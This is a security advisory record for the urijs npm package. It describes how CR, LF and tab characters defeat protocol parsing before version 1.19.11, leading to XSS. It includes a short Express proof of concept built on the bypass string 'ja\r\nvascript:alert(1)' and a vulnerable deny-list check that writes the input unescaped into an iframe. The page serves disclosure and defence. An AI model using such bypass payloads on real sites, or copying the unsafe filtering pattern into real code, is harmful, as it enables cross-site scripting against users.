GHSA-3vjf-82ff-p4r3

Source
https://github.com/advisories/GHSA-3vjf-82ff-p4r3
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-3vjf-82ff-p4r3/GHSA-3vjf-82ff-p4r3.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-3vjf-82ff-p4r3
Aliases
Published
2022-04-06T00:01:31Z
Modified
2023-11-01T04:57:19.732152Z
Severity
  • 7.2 (High) CVSS_V3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Summary
Incorrect protocol extraction via \r, \n and \t characters
Details

Carriage return (\r), line feed (\n) and tab (\t) characters in user-supplied URLs can lead to incorrect protocol extraction in the npm package urijs prior to version 1.19.11.

This can lead to XSS when the module is used to block malicious javascript: links before they are placed into HTML or JavaScript (see the following example):

const parse = require('urijs')
const express = require('express')
const app = express()
const port = 3000

// Attacker-controlled input: the CR/LF inside the scheme cause an affected
// urijs release to extract something other than "javascript" as the protocol.
const input = "ja\r\nvascript:alert(1)"
const url = parse(input)

console.log(url)

app.get('/', (req, res) => {
  // In urijs, protocol() is a method and returns the scheme without the colon.
  // This deny-list check is bypassed when the protocol is mis-extracted, so the
  // javascript: link ends up in the iframe src.
  if (url.protocol() !== "javascript") {res.send("<iframe src=\'" + input + "\'>CLICK ME!</iframe>")}
})

app.listen(port, () => {
  console.log(`Example app listening on port ${port}`)
})
Database specific
{
    "github_reviewed": true,
    "nvd_published_at": "2022-04-05T15:15:00Z",
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-20"
    ],
    "github_reviewed_at": "2022-04-07T15:45:58Z"
}
References

Affected packages

npm / urijs

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
1.19.11

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-3vjf-82ff-p4r3/GHSA-3vjf-82ff-p4r3.json"